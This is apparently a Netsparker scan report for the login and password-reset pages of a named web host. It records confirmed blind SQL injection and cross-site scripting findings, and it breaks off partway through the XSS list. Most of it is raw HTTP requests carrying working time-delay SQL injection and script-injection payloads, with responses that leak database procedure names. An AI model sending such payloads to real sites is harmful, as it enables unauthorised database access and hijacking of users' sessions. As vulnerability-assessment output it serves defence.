Blind SQL Injection REPORT SUMMARY, login1.vindicosuite.comLoading
Netsparker - Scan Report Summary
|
||||||||||
|
Total RequestsAverage Speedreq/sec. |
32
identified
26
confirmed
9
critical
7
informational
|
||||||||
GHDB, DORK TestsGHDB, DORK Tests
|
||||||||||
|
Authentication
Scheduled
|
|||||||||
VULNERABILITIESVulnerabilities
|
||
 |
CRITICAL
28 %
IMPORTANT
41 %
LOW
9 %
INFORMATION
22 %
|
|
Blind SQL Injection
Blind SQL Injection
9
TOTAL
CRITICAL
CONFIRMED
9
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed us to identify and confirm the SQL Injection.
Impact
Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
- Reading, Updating and Deleting arbitrary data from the database
- Executing commands on the underlying operating system
- Reading, Updating and Deleting arbitrary tables from the database
Actions to Take
- See the remedy for solution.
- If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
- Locate the all dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
- Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.
Remedy
A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.
External References
Remedy References
|
- /vindico_dynamic.asp
/vindico_dynamic.asp CONFIRMED |
Parameters
| Parameter | Type | Value |
| password | POST | ';WAITFOR DELAY '0:0:25'-- |
| username | POST | Smith |
Request
POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 60
Accept-Encoding: gzip, deflate
password=%27;WAITFOR%20DELAY%20%270:0:25%27--&username=Smith
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 60
Accept-Encoding: gzip, deflate
password=%27;WAITFOR%20DELAY%20%270:0:25%27--&username=Smith
Response
HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 182
Content-Type: text/html
Location: /default.asp?message=Invalid%20Username%20and%20or%20Password
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:57 GMT
<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="/default.asp?message=Invalid%20Username%20and%20or%20Password">here</a>.</body>
Cache-Control: private
Content-Length: 182
Content-Type: text/html
Location: /default.asp?message=Invalid%20Username%20and%20or%20Password
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:57 GMT
<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="/default.asp?message=Invalid%20Username%20and%20or%20Password">here</a>.</body>
|
- /AccountManager/ResetPassword/Exec_Reset.asp
/AccountManager/ResetPassword/Exec_Reset.asp CONFIRMED |
Parameters
| Parameter | Type | Value |
| username | POST | ';WAITFOR DELAY '0:0:25'-- |
| existingPassword | POST | 3 |
| newPassword | POST | 3 |
Request
POST /AccountManager/ResetPassword/Exec_Reset.asp HTTP/1.1
Referer: http://login1.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 78
Accept-Encoding: gzip, deflate
username=%27;WAITFOR%20DELAY%20%270:0:25%27--&existingPassword=3&newPassword=3
Referer: http://login1.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 78
Accept-Encoding: gzip, deflate
username=%27;WAITFOR%20DELAY%20%270:0:25%27--&existingPassword=3&newPassword=3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 216
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:45:24 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Procedure or function 'VINDICO_PASSWORD_SET' expects parameter '@existingPass', which was not supplied.</div>
Cache-Control: private
Content-Length: 216
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:45:24 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Procedure or function 'VINDICO_PASSWORD_SET' expects parameter '@existingPass', which was not supplied.</div>
|
- /vindico_dynamic.asp
/vindico_dynamic.asp CONFIRMED |
Parameters
| Parameter | Type | Value |
| username | POST | ';WAITFOR DELAY '0:0:25'-- |
| password | POST | 3 |
| loginBtn | POST | Login |
| resetPasswordBtn | POST | Reset Password |
Request
POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 103
Accept-Encoding: gzip, deflate
username=%27;WAITFOR%20DELAY%20%270:0:25%27--&password=3&loginBtn=Login&resetPasswordBtn=Reset+Password
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 103
Accept-Encoding: gzip, deflate
username=%27;WAITFOR%20DELAY%20%270:0:25%27--&password=3&loginBtn=Login&resetPasswordBtn=Reset+Password
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 212
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:46:51 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Procedure or function 'VINDICO_Authenticate' expects parameter '@password', which was not supplied.</div>
Cache-Control: private
Content-Length: 212
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:46:51 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Procedure or function 'VINDICO_Authenticate' expects parameter '@password', which was not supplied.</div>
|
- /vindico_dynamic.asp
/vindico_dynamic.asp CONFIRMED |
Parameters
| Parameter | Type | Value |
| username | POST | ';WAITFOR DELAY '0:0:25'-- |
| password | POST | 3 |
| loginBtn | POST | Login |
Request
POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 71
Accept-Encoding: gzip, deflate
username=%27;WAITFOR%20DELAY%20%270:0:25%27--&password=3&loginBtn=Login
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 71
Accept-Encoding: gzip, deflate
username=%27;WAITFOR%20DELAY%20%270:0:25%27--&password=3&loginBtn=Login
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 212
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:48:21 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Procedure or function 'VINDICO_Authenticate' expects parameter '@password', which was not supplied.</div>
Cache-Control: private
Content-Length: 212
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:48:21 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Procedure or function 'VINDICO_Authenticate' expects parameter '@password', which was not supplied.</div>
|
- /vindico_dynamic.asp
/vindico_dynamic.asp CONFIRMED |
Parameters
| Parameter | Type | Value |
| password | POST | 3 |
| username | POST | ';WAITFOR DELAY '0:0:25'-- |
Request
POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=LALJIJIDKJNKCGNAFCNIGBAG
Content-Length: 56
Accept-Encoding: gzip, deflate
password=3&username=%27;WAITFOR%20DELAY%20%270:0:25%27--
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=LALJIJIDKJNKCGNAFCNIGBAG
Content-Length: 56
Accept-Encoding: gzip, deflate
password=3&username=%27;WAITFOR%20DELAY%20%270:0:25%27--
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 212
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:50:03 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Procedure or function 'VINDICO_Authenticate' expects parameter '@password', which was not supplied.</div>
Cache-Control: private
Content-Length: 212
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:50:03 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Procedure or function 'VINDICO_Authenticate' expects parameter '@password', which was not supplied.</div>
|
- /AccountManager/ResetPassword/Exec_Reset.asp
/AccountManager/ResetPassword/Exec_Reset.asp CONFIRMED |
Parameters
| Parameter | Type | Value |
| username | POST | Smith |
| existingPassword | POST | ';WAITFOR DELAY '0:0:25'-- |
| newPassword | POST | 3 |
Request
POST /AccountManager/ResetPassword/Exec_Reset.asp HTTP/1.1
Referer: http://login1.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=JALJIJIDEAPEEKCNDEMHBCKE
Content-Length: 82
Accept-Encoding: gzip, deflate
username=Smith&existingPassword=%27;WAITFOR%20DELAY%20%270:0:25%27--&newPassword=3
Referer: http://login1.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=JALJIJIDEAPEEKCNDEMHBCKE
Content-Length: 82
Accept-Encoding: gzip, deflate
username=Smith&existingPassword=%27;WAITFOR%20DELAY%20%270:0:25%27--&newPassword=3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 211
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:50:02 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Procedure or function 'VINDICO_PASSWORD_SET' expects parameter '@newPass', which was not supplied.</div>
Cache-Control: private
Content-Length: 211
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:50:02 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Procedure or function 'VINDICO_PASSWORD_SET' expects parameter '@newPass', which was not supplied.</div>
|
- /vindico_dynamic.asp
/vindico_dynamic.asp CONFIRMED |
Parameters
| Parameter | Type | Value |
| username | POST | Smith |
| password | POST | ';WAITFOR DELAY '0:0:25'-- |
| loginBtn | POST | Login |
| resetPasswordBtn | POST | Reset Password |
Request
POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=LBLJIJIDAOIJMKNIHMGJMKDF
Content-Length: 107
Accept-Encoding: gzip, deflate
username=Smith&password=%27;WAITFOR%20DELAY%20%270:0:25%27--&loginBtn=Login&resetPasswordBtn=Reset+Password
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=LBLJIJIDAOIJMKNIHMGJMKDF
Content-Length: 107
Accept-Encoding: gzip, deflate
username=Smith&password=%27;WAITFOR%20DELAY%20%270:0:25%27--&loginBtn=Login&resetPasswordBtn=Reset+Password
Response
HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 182
Content-Type: text/html
Location: /default.asp?message=Invalid%20Username%20and%20or%20Password
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:52:33 GMT
<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="/default.asp?message=Invalid%20Username%20and%20or%20Password">here</a>.</body>
Cache-Control: private
Content-Length: 182
Content-Type: text/html
Location: /default.asp?message=Invalid%20Username%20and%20or%20Password
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:52:33 GMT
<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="/default.asp?message=Invalid%20Username%20and%20or%20Password">here</a>.</body>
|
- /vindico_dynamic.asp
/vindico_dynamic.asp CONFIRMED |
Parameters
| Parameter | Type | Value |
| username | POST | Smith |
| password | POST | ';WAITFOR DELAY '0:0:25'-- |
| loginBtn | POST | Login |
Request
POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=LBLJIJIDAOIJMKNIHMGJMKDF
Content-Length: 75
Accept-Encoding: gzip, deflate
username=Smith&password=%27;WAITFOR%20DELAY%20%270:0:25%27--&loginBtn=Login
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=LBLJIJIDAOIJMKNIHMGJMKDF
Content-Length: 75
Accept-Encoding: gzip, deflate
username=Smith&password=%27;WAITFOR%20DELAY%20%270:0:25%27--&loginBtn=Login
Response
HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 182
Content-Type: text/html
Location: /default.asp?message=Invalid%20Username%20and%20or%20Password
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:54:02 GMT
<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="/default.asp?message=Invalid%20Username%20and%20or%20Password">here</a>.</body>
Cache-Control: private
Content-Length: 182
Content-Type: text/html
Location: /default.asp?message=Invalid%20Username%20and%20or%20Password
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:54:02 GMT
<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="/default.asp?message=Invalid%20Username%20and%20or%20Password">here</a>.</body>
|
- /AccountManager/ResetPassword/Exec_Reset.asp
/AccountManager/ResetPassword/Exec_Reset.asp CONFIRMED |
Parameters
| Parameter | Type | Value |
| username | POST | Smith |
| existingPassword | POST | 3 |
| newPassword | POST | ';WAITFOR DELAY '0:0:25'-- |
Request
POST /AccountManager/ResetPassword/Exec_Reset.asp HTTP/1.1
Referer: http://login1.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=CFLJIJIDMIDNAMMNIHEPECNM
Content-Length: 82
Accept-Encoding: gzip, deflate
username=Smith&existingPassword=3&newPassword=%27;WAITFOR%20DELAY%20%270:0:25%27--
Referer: http://login1.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=CFLJIJIDMIDNAMMNIHEPECNM
Content-Length: 82
Accept-Encoding: gzip, deflate
username=Smith&existingPassword=3&newPassword=%27;WAITFOR%20DELAY%20%270:0:25%27--
Response
HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 172
Content-Type: text/html
Location: index.asp?message=Invalid%20Username%20/%20Password
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:55:40 GMT
<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="index.asp?message=Invalid%20Username%20/%20Password">here</a>.</body>
Cache-Control: private
Content-Length: 172
Content-Type: text/html
Location: index.asp?message=Invalid%20Username%20/%20Password
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:55:40 GMT
<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="index.asp?message=Invalid%20Username%20/%20Password">here</a>.</body>
Cross-site Scripting
Cross-site Scripting
12
TOTAL
IMPORTANT
CONFIRMED
12
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hi-jacking users' active session
- Changing the look of the page within the victims browser.
- Mounting a successful phishing attack.
- Intercept data and perform man-in-the-middle attacks.
Remedy
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
Remedy References
External References
|
- /vindico_dynamic.asp
/vindico_dynamic.asp CONFIRMED |
Parameters
| Parameter | Type | Value |
| password | POST | '"--></style></script><script>alert(0x000054)</script> |
| username | POST | Smith |
Request
POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 109
Accept-Encoding: gzip, deflate
password='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000054)%3c%2fscript%3e&username=Smith
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Content-Length: 109
Accept-Encoding: gzip, deflate
password='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000054)%3c%2fscript%3e&username=Smith
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 225
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:57 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Unclosed quotation mark after the character string '--></style></script><script>netsparker(0x000054)</script>''.</div>
Cache-Control: private
Content-Length: 225
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:57 GMT
<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Unclosed quotation mark after the character string '--></style></script><script>netsparker(0x000054)</script>''.</div>
|
- /AccountManager/ResetPassword/index.asp
/AccountManager/ResetPassword/index.asp CONFIRMED |
Parameters
| Parameter | Type | Value |
| message | GET | '"--></style></script><script>alert(0x000097)</script> |
Request
GET /AccountManager/ResetPassword/index.asp?message='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000097)%3C/script%3E HTTP/1.1
Referer: http://login1.vindicosuite.com/AccountManager/ResetPassword/Exec_ResetAndEmail.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Accept-Encoding: gzip, deflate
Referer: http://login1.vindicosuite.com/AccountManager/ResetPassword/Exec_ResetAndEmail.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3692
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:57 GMT
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM
-->
<head>
<title>Password Reset</title>
<script type="text/javascript">
function Handle_EmailPass () {
var MainForm = document.getElementById("frm");
var username = document.getElementById("username").value;
if (username == "") {
alert("A username/email address is required to reset the password.");
return;
} else {
MainForm.action = "Exec_ResetAndEmail.asp";
MainForm.submit();
}
}
function Handle_ResetPass () {
var MainForm = document.getElementById("frm");
MainForm.action = "Exec_Reset.asp";
MainForm.submit();
}
</script>
<link rel="stylesheet" type="text/css" href="../../App_Themes/Default/vindico2.css">
<style type="text/css">
body {
margin: 10px;
}
.divMessage {
margin-bottom: 8px;
font-weight: bold;
background-color: #d4e5ae;
border: 1px solid green;
color: black;
padding: 6px;
}
</style>
</head>
<body>
<div style="float: right;"><a style="color:blue;" href="#close" onclick="window.close();">close window</a></div>
<h3>VINDICO Password Reset</h3>
<div class='divMessage'>'"--></style></script><script>netsparker(0x000097)</script></div>
<form name = "frm" id="frm" action = "" method = "Post" autocomplete="off">
<table cellpadding="5" cellspacing="0" border = "0" style="width: 100%;">
<tr>
<td nowrap><strong>username (email):</strong></td>
<td width="100%">
<input id="username" type ="text" value= "" name="username">
</td>
</tr>
<tr>
<td nowrap><strong>current password:</strong></td>
<td width="100%">
<input type ="password" name="existingPassword" value= "">
</td>
</tr>
<tr>
<td nowrap><strong>new password:</strong></td>
<td width="100%">
<input type ="password" name="newPassword" value="">
</td>
</tr>
<tr>
<td></td>
<td>
<input type="button" value="reset password" onclick = "Handle_ResetPass();">
</td>
</tr>
<tr>
<td colspan=2>
<hr noshade size="1">
</td>
</tr>
<tr>
<td colspan="2">
If you <strong>can't remember your password, enter your username</strong>
(should be your email address)
in the username field above. Then, <strong>click 'Reset and Email'</strong>
and an email will be sent containing your new password.
<br><br>
<input type="button" value="reset and email" onclick = "Handle_EmailPass();">
</td>
</tr>
<tr>
<td colspan=2>
</td>
</tr>
<tr>
<td>
</td>
</tr>
</table>
<hr noshade size="1">
</form>
</body>
</html>
Cache-Control: private
Content-Length: 3692
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:57 GMT
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM
-->
<head>
<title>Password Reset</title>
<script type="text/javascript">
function Handle_EmailPass () {
var MainForm = document.getElementById("frm");
var username = document.getElementById("username").value;
if (username == "") {
alert("A username/email address is required to reset the password.");
return;
} else {
MainForm.action = "Exec_ResetAndEmail.asp";
MainForm.submit();
}
}
function Handle_ResetPass () {
var MainForm = document.getElementById("frm");
MainForm.action = "Exec_Reset.asp";
MainForm.submit();
}
</script>
<link rel="stylesheet" type="text/css" href="../../App_Themes/Default/vindico2.css">
<style type="text/css">
body {
margin: 10px;
}
.divMessage {
margin-bottom: 8px;
font-weight: bold;
background-color: #d4e5ae;
border: 1px solid green;
color: black;
padding: 6px;
}
</style>
</head>
<body>
<div style="float: right;"><a style="color:blue;" href="#close" onclick="window.close();">close window</a></div>
<h3>VINDICO Password Reset</h3>
<div class='divMessage'>'"--></style></script><script>netsparker(0x000097)</script></div>
<form name = "frm" id="frm" action = "" method = "Post" autocomplete="off">
<table cellpadding="5" cellspacing="0" border = "0" style="width: 100%;">
<tr>
<td nowrap><strong>username (email):</strong></td>
<td width="100%">
<input id="username" type ="text" value= "" name="username">
</td>
</tr>
<tr>
<td nowrap><strong>current password:</strong></td>
<td width="100%">
<input type ="password" name="existingPassword" value= "">
</td>
</tr>
<tr>
<td nowrap><strong>new password:</strong></td>
<td width="100%">
<input type ="password" name="newPassword" value="">
</td>
</tr>
<tr>
<td></td>
<td>
<input type="button" value="reset password" onclick = "Handle_ResetPass();">
</td>
</tr>
<tr>
<td colspan=2>
<hr noshade size="1">
</td>
</tr>
<tr>
<td colspan="2">
If you <strong>can't remember your password, enter your username</strong>
(should be your email address)
in the username field above. Then, <strong>click 'Reset and Email'</strong>
and an email will be sent containing your new password.
<br><br>
<input type="button" value="reset and email" onclick = "Handle_EmailPass();">
</td>
</tr>
<tr>
<td colspan=2>
</td>
</tr>
<tr>
<td>
</td>
</tr>
</table>
<hr noshade size="1">
</form>
</body>
</html>
|
- /vindico_dynamic.asp
/vindico_dynamic.asp CONFIRMED |
Parameters
| Parameter | Type | Value |
| password | POST | 3 |
| username | POST | '"--></style></script><script>alert(0x0000A5)</script> |
Request
POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login1.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vindicosuite.com
